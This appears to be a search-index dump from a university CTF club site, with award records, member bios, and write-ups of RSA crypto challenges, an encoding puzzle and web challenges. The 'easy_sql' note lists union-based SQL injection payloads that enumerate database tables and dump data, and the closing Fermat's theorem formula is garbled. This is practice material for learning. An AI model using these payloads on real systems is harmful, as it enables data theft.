\u5730\u70b9\uff1a\u6c5f\u82cf\uff0c\u82cf\u5dde\u5e02\u59d1\u82cf\u533a\u5e73\u6c5f\u65b0\u57ce\u82cf\u7ad9\u8def1588\u53f7\uff0c\u7ef4\u4e5f\u7eb3\u9152\u5e97\uff08\u82cf\u5dde\u706b\u8f66\u7ad9\u5317\u5e7f\u573a\u5e97\uff09\u4e09\u697c\u8096\u90a6\u5385 [2019/??/??] - \u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e94\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e09\u7b49\u5956 \u5730\u70b9\uff1a\u798f\u5dde [2019/??/??] - \u9ad8\u6821\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u7ba1\u7406\u8fd0\u7ef4\u6311\u6218\u8d5b \u4e09\u7b49\u5956 \u5730\u70b9\uff1a\u897f\u5b89 [2019/??/??] - \u201c\u9ec4\u9e64\u676f\u201d\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u4e0e\u521b\u65b0\u5cf0\u4f1a\u66a8\u7f51\u7edc\u5b89\u5168\u670d\u52a1\u4e0e\u521b\u65b0\u80fd\u529b\u5927\u8d5b \u4f18\u79c0\u5956 \u5730\u70b9\uff1a\u6b66\u6c49 [2019/??/??] - \u897f\u6e56\u8bba\u5251\u4e2d\u56fd\u676d\u5dde\u7f51\u7edc\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4f18\u79c0\u5956 \u5730\u70b9\uff1a\u6d59\u6c5f "},{"location":"award/#2018","title":"2018","text":" [2018/12/28] - \u201c\u767e\u8d8a\u676f\u201d\u7b2c\u56db\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e00\u7b49\u5956 \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde [2018/12/07] - \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u5168\u56fd\u603b\u51b3\u8d5b \u4e8c\u7b49\u5956 \u7ebf\u4e0b\u5730\u70b9\uff1a\u5317\u4eac\uff0c\u5317\u4eac\u822a\u7a7a\u822a\u5929\u5927\u5b66 [2018/06/09] - \u7b2c\u5341\u4e00\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u5927\u8d5b \u4e09\u7b49\u5956\uff08\u534e\u4e1c\u5357\u8d5b\u533a\u7b2c4\u540d\uff09 \u7ebf\u4e0b\u5730\u70b9\uff1a\u6c5f\u82cf\uff0c\u82cf\u5dde\u5e02\u4f1a\u8bae\u4e2d\u5fc3 [2018/05/11] - 2018 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u798f\u5efa\u8d5b\u533a \u4e00\u7b49\u5956\uff08\u7b2c2\u540d\uff09 \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde [2018/04/26] - 2018 \u5b89\u6052\u201c\u897f\u6e56\u8bba\u5251\u676f\u201d\u5168\u56fd\u5927\u5b66\u751f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4e2a\u4eba\u8d5b\u4e09\u7b49\u5956 \u7ebf\u4e0b\u5730\u70b9\uff1a\u6d59\u6c5f\u676d\u5dde\u56fd\u9645\u535a\u89c8\u4e2d\u5fc3 [2018/03/10] - *CTF 2018 97th [2018/03/10] - N1CTF 2018 83th [2018/??/??] - HITB-XCTF GSEC CTF 2018 Final\uff08Member\uff09 \u7ebf\u4e0b\u5730\u70b9\uff1a\u65b0\u52a0\u5761\uff08Singapore\uff09\uff0cNational University of Singapore "},{"location":"award/#2017","title":"2017","text":" [2017/11/26] - \u7b2c\u56db\u5c4a\u201c\u9ed1\u76fe\u676f\u201d\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b \u4e00\u7b49\u5956\uff08\u5168\u7701\u7b2c\u4e8c\u540d\uff09 \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde [2017/11/23] - 360 SRC\u7b2c\u4e8c\u5c4a48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\uff08\u798f\u5dde\u7ad9\uff09 \u7efc\u5408\u79ef\u5206\u7b2c4\u540d [2017/11/10] - HCTF 2017 58th \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde [2017/10/27] - \u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e09\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e00\u7b49\u5956\u3001\u4e09\u7b49\u5956 \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde [2017/04/22] - 2017\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u534e\u5357\u8d5b\u533a\u201c\u6606\u4ed1\u4e2d\u9510\u676f\u201d\u4f01\u4e1a\u8d5b \u51a0\u519b \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde\uff0c\u798f\u5dde\u5927\u5b66 "},{"location":"award/#2016","title":"2016","text":" [2016/12/11] - \u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e8c\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e8c\u7b49\u5956\u3001\u4e09\u7b49\u5956\u3001\u4f18\u80dc\u5956 \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde [2016/06/09] - \u534f\u4f1a\u6210\u7acb "},{"location":"member/","title":"\u534f\u4f1a\u6210\u5458","text":""},{"location":"member/#2021-2022","title":"2021-2022","text":" rYu1nser (IceCliffs) - \u95dc\u6ce8\u6771\u96ea\u84ee\u8b1d\u8b1d\u55b5\uff0c\u95dc\u6ce8\u6771\u96ea\u84ee\u8b1d\u8b1d\u55b5\uff0821-22\u534f\u4f1a\u4f1a\u957f\uff09 "},{"location":"member/#2020-2021","title":"2020-2021","text":" me7eorite - \uff08\u795e\uff09 x1aoB1n\uff08\u7c73\u536b\u5175\uff09 - \u539f\u795e60\u7ea7+\u661f\u7a79\u94c1\u905370\u7ea7\uff0820-21\u534f\u4f1a\u4f1a\u957f\uff09 \u6843\u5b50\u4e4c\u9f99 whisper "},{"location":"member/#2019-2020","title":"2019-2020","text":""},{"location":"member/#2018-2019","title":"2018-2019","text":" White - \u4e0d\u53ef\u7ed3\u7f18 \u5f92\u589e\u5bc2\u5bde Alienworm - \u8fd8\u6ca1\u627e\u5230\u95e8\u7684ctf\u9009\u624b Southseast - \u8346\u68d8\u523a\u7a7f\u6211\u7684\u811a\u638c\u8def\u574e\u5777\u800c\u6f2b\u957f\u3002 Cosmos - \u4eba\u751f\u5982\u9006\u65c5,\u6211\u4ea6\u662f\u884c\u4eba\u3002 Nepire - \u53a6\u822a\u516c\u5b50:\u4e00\u4efd\u4ee3\u7801\u5343\u4e24\u884c,\u79d1\u5b66\u4e0a\u7f51\u6211\u6700\u5f3a,\u8d5b\u540e\u79d2\u9898\u7406\u6c14\u58ee,\u633a\u8fdb\u51b3\u8d5b\u558a\u51c9\u51c9\u3002 \u8c46\u6d46\u6cb9\u6761 - \u5fd7\u5728\u5c71\u9876\u7684\u4eba\uff0c\u4e0d\u4f1a\u8d2a\u5ff5\u5c71\u8170\u7684\u98ce\u666f\u3002 SweetPotato - \u6211\u80fd\u541e\u4e0b\u73bb\u7483\u800c\u4e0d\u4f24\u8eab\u4f53 "},{"location":"member/#2017-2018","title":"2017-2018","text":" Sheldon - \u4eba\u751f\u4e0d\u5982\u610f,\u5341\u6709\u516b\u4e5d\uff0817-18\u534f\u4f1a\u4f1a\u957f\uff09 Saltyfishy - \u4eba\u5982\u679c\u6ca1\u6709\u68a6\u60f3\uff0c\u90a3\u53ef\u592a\u8212\u670d\u4e86\uff01 \u5f20\u52a8\u4e4b - \u5165\u95e8\u7ea7ctf\u9009\u624b "},{"location":"member/#2016-2017","title":"2016-2017","text":" PeterZ - \u4e00\u53ea\u6c89\u8ff7\u4ee3\u7801\u7684\u81ea\u7531\u9e70\uff08\u534f\u4f1a\u521b\u59cb\u4eba\uff0c16-17\u534f\u4f1a\u4f1a\u957f\uff09 Xishir - A code monster.\uff08\u534f\u4f1a\u521b\u59cb\u4eba\uff0c16-18\u534f\u4f1a\u526f\u4f1a\u957f\uff09 l1nk3r - \u613f\u4f60\u51fa\u8d70\u534a\u751f\u5f52\u6765\u4ecd\u662f\u5c11\u5e74 backCover7 - Light up the Night! Jaken - River flows in you. \u6ce1\u9762 - \u552f\u5229\u662f\u56fe ju5tw4nty0u - Nothing is impossible to a willing heart. "},{"location":"ctfnotes/CTF-CPYPTO-2/","title":"CTF CPYPTO happy","text":"\u4e0b\u8f7d\u4e0b\u6765\u9644\u4ef6
('c=', '0x7a7e031f14f6b6c3292d11a41161d2491ce8bcdc67ef1baa9eL') ('e=', '0x872a335')
","tags":["\u7b2c\u4e8c\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-CPYPTO-2/#q-qp3-1285367317452089980789441829580397855321901891350429414413655782431779727560841427444135440068248152908241981758331600586","title":"q + q*p^3 =1285367317452089980789441829580397855321901891350429414413655782431779727560841427444135440068248152908241981758331600586","text":"","tags":["\u7b2c\u4e8c\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-CPYPTO-2/#qp-q-p2-1109691832903289208389283296592510864729403914873734836011311325874120780079555500202475594","title":"qp + q *p^2 = 1109691832903289208389283296592510864729403914873734836011311325874120780079555500202475594","text":"\u7531\u4e8e0x\u5f00\u5934\u6ca1\u6709L\uff0c\u5148\u628aL\u53bb\u6389
\u4f7f\u7528gmpy2 \u7f16\u5199python\u811a\u672c
import gmpy2\nimport sympy\nfrom Crypto.Util.number import *\nc = 0x7a7e031f14f6b6c3292d11a41161d2491ce8bcdc67ef1baa9e\n\ne = 0x872a335\n\nk1=1285367317452089980789441829580397855321901891350429414413655782431779727560841427444135440068248152908241981758331600586\nk2 =gmpy2.mpz(k1)\nk2=1109691832903289208389283296592510864729403914873734836011311325874120780079555500202475594\n\np=sympy.Symbol('p')\nq=sympy.Symbol('q')\nsolved_value=sympy.solve([q + q*p**3 - k1,q*p + q*p**2 -k2], [p,q])\nprint(solved_value)\np=1158310153629932205401500375817\nq=827089796345539312201480770649\n\nd = gmpy2.invert(e,(p-1)*(q-1))\nm = gmpy2.powmod(c,d,p*q)\nprint(long_to_bytes(m))\n
\u5f97\u5230flag
","tags":["\u7b2c\u4e8c\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-CRYPTO-1/","title":"ez_rsa:","text":"\u4e0b\u8f7d\u9644\u4ef6\uff1a
\u7528\u7f16\u5199python\u4ee3\u7801\uff0c\u56e0\u4e3aRSA\u53ef\u9006 :
p = 1325465431\n\nq = 152317153\n\ne = 65537\n\nn = p*q\n\nL = (p-1)*(q-1)\n\nd = pow(e,-1,L)\n\nprint(d)\n
\u89e3\u51faD=43476042047970113
\u518d\u7ecf\u8fc7md5\u52a0\u5bc6\u5f97\u5230flag
","tags":["\u7b2c\u4e8c\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-CRYPTO-3/","title":"RSA\u5171\u6a21\uff1a","text":"\u9644\u4ef6.py\uff1a
from gmpy2 import *\n\nfrom Crypto.Util.number import *\n\n\nflag = '***************'\n\np = getPrime(512)\n\nq = getPrime(512)\n\nm1 = bytes_to_long(bytes(flag.encode()))\n\n\nn = p*q\n\ne1 = getPrime(32)\n\ne2 = getPrime(32)\n\nprint()\n\nflag1 = pow(m1,e1,n)\n\nflag2 = pow(m1,e2,n)\n\nprint('flag1= '+str(flag1))\n\nprint('flag2= '+str(flag2))\n\nprint('e1= ' +str(e1))\n\nprint('e2= '+str(e2))\n\nprint('n= '+str(n))\n\n\n\nflag1= 100156221476910922393504870369139942732039899485715044553913743347065883159136513788649486841774544271396690778274591792200052614669235485675534653358596366535073802301361391007325520975043321423979924560272762579823233787671688669418622502663507796640233829689484044539829008058686075845762979657345727814280\n\nflag2= 86203582128388484129915298832227259690596162850520078142152482846864345432564143608324463705492416009896246993950991615005717737886323630334871790740288140033046061512799892371429864110237909925611745163785768204802056985016447086450491884472899152778839120484475953828199840871689380584162839244393022471075\n\ne1= 3247473589\n\ne2= 3698409173\n\nn= 103606706829811720151309965777670519601112877713318435398103278099344725459597221064867089950867125892545997503531556048610968847926307322033117328614701432100084574953706259773711412853364463950703468142791390129671097834871371125741564434710151190962389213898270025272913761067078391308880995594218009110313\n
python\u811a\u672c
from gmpy2 import *\nfrom Crypto.Util.number import *\n\nflag1= 100156221476910922393504870369139942732039899485715044553913743347065883159136513788649486841774544271396690778274591792200052614669235485675534653358596366535073802301361391007325520975043321423979924560272762579823233787671688669418622502663507796640233829689484044539829008058686075845762979657345727814280\nflag2= 86203582128388484129915298832227259690596162850520078142152482846864345432564143608324463705492416009896246993950991615005717737886323630334871790740288140033046061512799892371429864110237909925611745163785768204802056985016447086450491884472899152778839120484475953828199840871689380584162839244393022471075\ne1= 3247473589\ne2= 3698409173\nn= 103606706829811720151309965777670519601112877713318435398103278099344725459597221064867089950867125892545997503531556048610968847926307322033117328614701432100084574953706259773711412853364463950703468142791390129671097834871371125741564434710151190962389213898270025272913761067078391308880995594218009110313\n\ndef egcd(a, b):\n if a == 0:\n return (b, 0, 1)\n else:\n g, y, x = egcd(b % a, a)\n return (g, x - (b // a) * y, y)\ns = egcd(e1,e2)\ns1 = s[1]\ns2 = s[2]\nm = pow(flag1,s1,n)*pow(flag2,s2,n) % n\n# print(m)\nflag = long_to_bytes(m)\nprint(flag)\n
\u6c42\u5f97NSSCTF{xxxxx**xxxxx}
","tags":["\u7b2c\u4e8c\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-CRYPTO-4/","title":"[\u7f8a\u57ce\u676f 2021]Bigrsa","text":"\u9644\u4ef6\u63d0\u793a\uff1a\u5171\u4eab\u7d20\u6570
from Crypto.Util.number import * from gmpy2 import *
","tags":["\u7b2c\u4e8c\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-CRYPTO-4/#from-flag-import","title":"from flag import *","text":"from Crypto.Util.number import *\nfrom flag import *\n\nn1 = 103835296409081751860770535514746586815395898427260334325680313648369132661057840680823295512236948953370895568419721331170834557812541468309298819497267746892814583806423027167382825479157951365823085639078738847647634406841331307035593810712914545347201619004253602692127370265833092082543067153606828049061\nn2 = 115383198584677147487556014336448310721853841168758012445634182814180314480501828927160071015197089456042472185850893847370481817325868824076245290735749717384769661698895000176441497242371873981353689607711146852891551491168528799814311992471449640014501858763495472267168224015665906627382490565507927272073\ne = 65537\n\n# m = bytes_to_long(flag)\n\n# c = pow(m, e, n1)\n\n# c = pow(c, e, n2)\n\n# print(\"c = %d\" % c)\n\n# output\n\nc = 60406168302768860804211220055708551816238816061772464557956985699400782163597251861675967909246187833328847989530950308053492202064477410641014045601986036822451416365957817685047102703301347664879870026582087365822433436251615243854347490600004857861059245403674349457345319269266645006969222744554974358264\n
\u7f16\u5199\u811a\u672c
from Crypto.Util.number import *\nfrom gmpy2 import *\n# from flag import *\n\nn1 = 103835296409081751860770535514746586815395898427260334325680313648369132661057840680823295512236948953370895568419721331170834557812541468309298819497267746892814583806423027167382825479157951365823085639078738847647634406841331307035593810712914545347201619004253602692127370265833092082543067153606828049061\nn2 = 115383198584677147487556014336448310721853841168758012445634182814180314480501828927160071015197089456042472185850893847370481817325868824076245290735749717384769661698895000176441497242371873981353689607711146852891551491168528799814311992471449640014501858763495472267168224015665906627382490565507927272073\ne = 65537\n# m = bytes_to_long(flag)\n# c = pow(m, e, n1)\n# c = pow(c, e, n2)\n\n# print(\"c = %d\" % c)\n\n# output\nc = 60406168302768860804211220055708551816238816061772464557956985699400782163597251861675967909246187833328847989530950308053492202064477410641014045601986036822451416365957817685047102703301347664879870026582087365822433436251615243854347490600004857861059245403674349457345319269266645006969222744554974358264\n\np=GCD(n1,n2)\nq1=n1//p\nq2=n2//p\n\nphi1=(p-1)*(q1-1)\nphi2=(p-1)*(q2-1)\n\nd1=gmpy2.invert(e,phi1)\nd2=gmpy2.invert(e,phi2)\nc1=pow(c,d2,n2)\nm=pow(c1,d1,n1)\nflag = long_to_bytes(m)\nprint(flag)\n
\u5f97flag\uff1a
SangFor{qSccmm1WrgvIg2Uq_cZhmqNfEGTz2GV8}
","tags":["\u7b2c\u4e8c\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-CRYPTO-5/","title":"[\u9e64\u57ce\u676f 2021]A_CRYPTO","text":"4O595954494Q32515046324757595N534R52415653334357474R4N575955544R4O5N4Q46434S4O59474253464Q5N444R4Q51334557524O5N4S424944473542554O595N44534O324R49565746515532464O49345649564O464R4R494543504N35
\u5148rot 13
\u5f974B595954494D32515046324757595A534E52415653334357474E4A575955544E4B5A4D46434F4B59474253464D5A444E4D51334557524B5A4F424944473542554B595A44534B324E49565746515532464B49345649564B464E4E494543504A35
\u518dbase16
KYYTIM2QPF2GWYZSNRAVS3CWGNJWYUTNKZMFCOKYGBSFMZDNMQ3EWRKZOBIDG5BUKYZDSK2NIVWFQU2FKI4VIVKFNNIECPJ5
\u518dbase32
V143Pytkc2lAYlV3SlRmVXQ9X0dVdmd6KEYpP3t4V29+MElXSER9TUEkPA==
\u518dbase64
\u5f97W^7?+dsi@bUwJTfUt=_GUvgz(F)?{xWo~0IWHD}MA$<
\u6700\u540e\u5728https://gchq.github.io/CyberChef/\u4e0a\u8f6cbase85
\u5f97
","tags":["\u7b2c\u4e8c\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-WEB-2/","title":"easy_sql","text":"title\u63d0\u793a\u53c2\u6570\u662fwllm
order by\u67e5\u770b\u6709\u51e0\u5217
\u5f97\u52303\u5217
\u6539wllm=-1
?wllm=-1\u2019 union select 1,2,3 --+
\u5f97\u52302,3
?wllm=-1' union select 1,2,database()--+
?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+
?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test_tb'--+
/?wllm=-1' union select 1,2,group_concat(id,flag) from test_tb--+
\u5f97\u5230flag
","tags":["\u7b2c\u4e00\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-Web-1/","title":"CTF WEB wp-1","text":"","tags":["\u7b2c\u4e00\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-Web-1/#do_you_konw_http","title":"Do_you_konw_http","text":"\u63d0\u793a\u4fee\u6539user agent \u4e3aWLLM
\u4f7f\u7528burp\u6293\u5305 \u7136\u540esend \u5230 repeater\u4e2d \u5728repeater\u4e2d\u4fee\u6539\u4e3aWLLM
\u5f97\u5230
\u63d0\u793a\u6709\u4e2aa.php
\u89e3\u9664\u62e6\u622a\u540e\u8fdb\u5165\u5230a.php
\u8981\u5c06\u5730\u5740\u6539\u4e3a\u672c\u5730\u7684\u56de\u73af\u5730\u5740\uff0c\u4e5f\u5c31\u662f127.0.0.1
\u4f7f\u7528fakeip\u63d2\u4ef6\u8fdb\u884c\u4fee\u6539ip
\u663e\u793asuccess\uff0c\u5e76\u53d1\u73b0secretttt.php
\u8fdb\u5165\u5230secretttt.php \u5f97\u5230flag
","tags":["\u7b2c\u4e00\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/","title":"RSA\u7b97\u6cd5\u539f\u7406","text":"\u672c\u6587\u501f\u9274\u4e86https://en.wikipedia.org/wiki/RSA_(cryptosystem) \u4e2d\u7684\u8d44\u6599\u548c\u4e9b\u56fe\u7247
","tags":["\u7b2c\u4e09\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/#rsa_1","title":"\u4e00\u3001RSA\u52a0\u5bc6\u8fc7\u7a0b\uff1a","text":"","tags":["\u7b2c\u4e09\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/#1rsa","title":"\uff081\uff09RSA\u57fa\u672c\u539f\u5219\uff1a","text":"\u200b RSA \u80cc\u540e\u7684\u4e00\u4e2a\u57fa\u672c\u539f\u5219\u662f\u89c2\u5bdf\u5230\u627e\u5230\u4e09\u4e2a\u975e\u5e38\u5927\u7684\u6b63\u6574\u6570 e\u3001d \u548c n \u662f\u53ef\u884c\u7684\uff0c\u4f7f\u5f97\u5bf9\u6240\u6709\u6574\u6570 m\uff080 \u2264 m < n\uff09\u8fdb\u884c\u6a21\u5e42\u8fd0\u7b97\uff1a
\u200b
\u200b \u4e09\u6760\u8868\u793a\u6a21\u540c\u4f59\uff0c\u4e5f\u5c31\u662f\u5f53\u8c03\u6362e\u548cd\u7684\u4f4d\u7f6e\uff0c\u4f1a\u6709\u76f8\u540c\u7684\u4f59\u6570
RSA \u6d89\u53ca\u516c\u94a5\u548c\u79c1\u94a5\u3002\u516c\u94a5\u662f\u4f17\u6240\u5468\u77e5\u7684\uff0c\u7528\u4e8e\u52a0\u5bc6\u6d88\u606f\u3002\u76ee\u7684\u662f\u4f7f\u7528\u516c\u94a5\u52a0\u5bc6\u7684\u6d88\u606f\u53ea\u80fd\u5728\u5408\u7406\u7684\u65f6\u95f4\u5185\u4f7f\u7528\u79c1\u94a5\u89e3\u5bc6\u3002\u516c\u94a5\u7531\u6574\u6570n\u548ce\u8868\u793a\uff0c\u79c1\u94a5\u7531\u6574\u6570d\u8868\u793a\uff08\u5c3d\u7ba1\u5728\u89e3\u5bc6\u8fc7\u7a0b\u4e2d\u4e5f\u4f1a\u4f7f\u7528n\uff0c\u56e0\u6b64\u5b83\u4e5f\u53ef\u80fd\u88ab\u8ba4\u4e3a\u662f\u79c1\u94a5\u7684\u4e00\u90e8\u5206\uff09\u3002m\u4ee3\u8868\u6d88\u606f\u3002
","tags":["\u7b2c\u4e09\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/#2","title":"\uff082\uff09\u5bc6\u94a5\u751f\u6210\uff1a","text":"RSA\u7b97\u6cd5\u7684\u5bc6\u94a5\u4ee5\u4e0b\u65b9\u5f0f\u751f\u6210\uff1a
1.\u9009\u62e9\u4e24\u4e2a\u76f8\u5dee\u5927\u7684\u5927\u8d28\u6570 p \u548c q
\u200b \u4e3a\u4e86\u4f7f\u5f97\u56e0\u5f0f\u5206\u89e3\u66f4\u96be\uff0cp\u548cq\u8981\u968f\u673a\u9009\u62e9\uff1a\u4e3a\u4e86\u9009\u62e9\u5b83\u4eec\uff0c\u6807\u51c6\u65b9\u6cd5\u662f\u9009\u62e9\u968f\u673a\u6574\u6570\u5e76\u4f7f\u7528\u7d20\u6570\u6d4b\u8bd5\uff0c\u76f4\u5230\u627e\u5230\u4e24\u4e2a\u7d20\u6570\u3002p\u548cq\u5e94\u4fdd\u5bc6
2.\u8ba1\u7b97n
\u200b n = p*q
\u200b n\u4f5c\u4e3a\u516c\u94a5\u548c\u79c1\u94a5\u7684\u6a21\u6570\u3002\u5b83\u7684\u957f\u5ea6\uff0c\u901a\u5e38\u7528\u6bd4\u7279\u6765\u8868\u793a\uff0c\u5c31\u662f\u5bc6\u94a5\u957f\u5ea6
3.\u8ba1\u7b97\u03bb ( n )
\u5728\u6570\u8bba\u8fd9\u4e00\u6570\u5b66\u5206\u652f\u4e2d\uff0c\u6b63\u6574\u6570n\u7684Carmichael \u51fd\u6570 \u03bb ( n )\u662f\u6ee1\u8db3\u4ee5\u4e0b\u6761\u4ef6\u7684 \u6700\u5c0f\u6b63\u6574\u6570m
\u200b \u5728\u4ee3\u6570\u672f\u8bed\u4e2d\uff0c\u03bb ( n )\u662f\u6574\u6570\u4e58\u6cd5\u7fa4\u5bf9n\u53d6\u6a21\u7684\u6307\u6570\u3002
\u7531\u4e8en = pq , \u03bb ( n ) = lcm ( \u03bb ( p ), \u03bb ( q ))\uff0c\u5e76\u4e14\u7531\u4e8ep\u548cq\u662f\u7d20\u6570\uff0c\u56e0\u6b64\u03bb ( p ) = \u03c6 ( p ) = p \u2212 1\uff0c\u540c\u6837\u5730\u03bb ( q ) = q \u2212 1\u3002\u56e0\u6b64\u03bb( n ) = lcm( p \u2212 1, q \u2212 1)\u3002
4.\u9009\u62e9\u4e00\u4e2a\u6574\u6570e\u4f7f\u5f972 < e < \u03bb ( n )\u548cgcd ( e , \u03bb ( n )) = 1\uff1b\u4e5f\u5c31\u662f\u8bf4\uff0ce\u548c\u03bb ( n )\u4e92\u8d28\u3002
\u200b \u6700\u5e38\u9009\u62e9\u7684e\u503c\u662f2^16 + 1 =65537
\u200b e\u4f5c\u4e3a\u516c\u94a5\u7684\u4e00\u90e8\u5206\u53d1\u5e03
5.\u786e\u5b9ad
\u200b d \u2261 e \u22121 (mod \u03bb ( n ))\uff1b\u4e5f\u5c31\u662f\u8bf4\uff0cd\u662fe\u6a21\u03bb ( n )\u7684\u6a21\u4e58\u9006
\u200b
","tags":["\u7b2c\u4e09\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/#ras","title":"\u4e8c\u3001RAS\u89e3\u5bc6\u8fc7\u7a0b\uff1a","text":"\u200b \u901a\u8fc7\u8ba1\u7b97\u4f7f\u5f97\u79c1\u94a5\u6307\u6570\u4eced\u5230c\u6062\u590dm
\u793a\u4f8b\uff1a
\u200b \u4f46\u5b9e\u9645\u4f7f\u7528\u4e2d\u56fd\u4f59\u6570\u5b9a\u7406\u6765\u52a0\u901f\u56e0\u5b50\u6a21\u6570\u7684\u8ba1\u7b97\uff08mod pq \u4f7f\u7528 mod p \u548c mod q)
","tags":["\u7b2c\u4e09\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/#_1","title":"\u4e2d\u56fd\u4f59\u6570\u7b97\u6cd5\uff1a","text":"\u200b
\u200b
","tags":["\u7b2c\u4e09\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/#_2","title":"\u7b7e\u540d\u6d88\u606f","text":"\u5047\u8bbe Alice \u5e0c\u671b\u5411 Bob \u53d1\u9001\u4e00\u6761\u7b7e\u540d\u6d88\u606f\u3002\u5979\u53ef\u4ee5\u4f7f\u7528\u81ea\u5df1\u7684\u79c1\u94a5\u6765\u8fd9\u6837\u505a\u3002\u5979\u751f\u6210\u6d88\u606f\u7684\u6563\u5217\u503c\uff0c\u5c06\u5176\u8ba1\u7b97\u4e3ad\u7684\u5e42\uff08\u6a21n\uff09\uff08\u5c31\u50cf\u5979\u5728\u89e3\u5bc6\u6d88\u606f\u65f6\u6240\u505a\u7684\u90a3\u6837\uff09\uff0c\u5e76\u5c06\u5176\u4f5c\u4e3a\u201c\u7b7e\u540d\u201d\u9644\u52a0\u5230\u6d88\u606f\u4e2d\u3002\u5f53 Bob \u6536\u5230\u7b7e\u540d\u6d88\u606f\u65f6\uff0c\u4ed6\u4f7f\u7528\u76f8\u540c\u7684\u54c8\u5e0c\u7b97\u6cd5\u7ed3\u5408 Alice \u7684\u516c\u94a5\u3002\u4ed6\u5bf9\u7b7e\u540d\u6c42e\u6b21\u65b9\uff08\u6a21n\uff09\uff08\u5c31\u50cf\u4ed6\u5728\u52a0\u5bc6\u6d88\u606f\u65f6\u6240\u505a\u7684\u90a3\u6837\uff09\uff0c\u5e76\u5c06\u751f\u6210\u7684\u6563\u5217\u503c\u4e0e\u6d88\u606f\u7684\u6563\u5217\u503c\u8fdb\u884c\u6bd4\u8f83\u3002\u5982\u679c\u4e24\u8005\u4e00\u81f4\uff0c\u4ed6\u5c31\u77e5\u9053\u6d88\u606f\u7684\u4f5c\u8005\u62e5\u6709\u7231\u4e3d\u4e1d\u7684\u79c1\u94a5\uff0c\u5e76\u4e14\u6d88\u606f\u81ea\u53d1\u9001\u4ee5\u6765\u6ca1\u6709\u88ab\u7be1\u6539\u8fc7\u3002
\u8fd9\u662f\u8fd0\u7528\u4e86\u6c42\u5e42\u89c4\u5219\uff1a
","tags":["\u7b2c\u4e09\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/#_3","title":"\u8d39\u9a6c\u5c0f\u5b9a\u7406","text":"\u200b \u5982\u679cp\u662f\u7d20\u6570\uff0c\u5219\u5bf9\u4e8e\u4efb\u610f\u7684a\uff0c\u6570a^p-a\u662fp\u7684\u6574\u6570\u500d\u3002
\u200b
\u4f8b\u5982 a =2, p =7 \u5219 2^7 = 128,128-2=126=7*18 \u4e3a7\u7684\u6574\u6570\u500d
\u5982\u679ca \u4e0d\u80fd\u88abp\u6574\u9664\uff0c\u5373\u5982\u679ca\u4e0ep\u4e92\u8d28\uff0c\u8d39\u9a6c\u5c0f\u5b9a\u7406\u7b49\u4ef7\u4e8e\uff08p^-1\uff09-1\u662fp\u7684\u6574\u6570\u500d
